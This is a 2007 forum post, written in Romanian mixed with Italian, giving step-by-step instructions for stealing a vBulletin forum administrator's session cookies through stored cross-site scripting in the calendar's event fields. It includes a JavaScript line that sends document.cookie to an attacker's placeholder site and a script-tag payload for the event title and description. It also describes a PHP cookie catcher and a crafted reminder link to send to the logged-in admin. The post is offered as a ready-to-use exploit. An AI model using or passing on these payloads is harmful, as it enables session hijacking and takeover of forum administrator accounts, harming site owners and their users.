Dark_net Posted July 24, 2007 Report Posted July 24, 2007 Vbulletin Stealing Admin's Cookies (step by step by Dark_net):1) Creati un JS si scrieti: location.href='http://[your_site]/?cookie.php?c='+(document.cookie)2) Creati un file cookie.php <- un file php care captureaza i cookies si trasmite pe e-mailul vostru o salveaza in un file TXT, HTML, ecc3) Cautati un Vbulletin cu CALENDAR (calendar.php <-by default)si creati un nou event (Add New Event)4) Unde este argomentul (Title) scrieti: </title><SCRIPT SRC=http://www.[your_site]/[your_js].js></SCRIPT> 5) Si unde este 'Corpul mesajului' (descrierea) (in ingleza: Event Information) scrieti la fel:</title><SCRIPT SRC=http://www.[your_site]/[your_js].js></SCRIPT> 6) Salvati! (Save Event in basso)Cind vine salvat o sa vedeti un URL ca asta:[target]/forum/calendar.php?do=getinfo&e=5&day=2007-7-21&c=1Duceteva unde este URLul si modificati partea asta: getinfo&e=5&day=2007-7-21&c=1Cu:addreminder&e=[ID] <- in acest exemplu ID-ul o sa fie: 57) Totul ii terminat!Pe urma trebuie sa trimiteti Linkul la admin in acest mod:[url]www.sito_della_vittima.com/forum/calendar.php?do=addreminder&e=[/url][ID_DELL'EVENTO]Admin-ul trebuie sa fie pe forum cu Login efectuat!Daca o sa se duca pe linkul la eventul cu XSS o sa aveti cookies de adminByeZ // Dark_net //P.S. scuzati romana mea :S si cred ca pot sa-l postez si aicia , ii un exploit XSS Quote
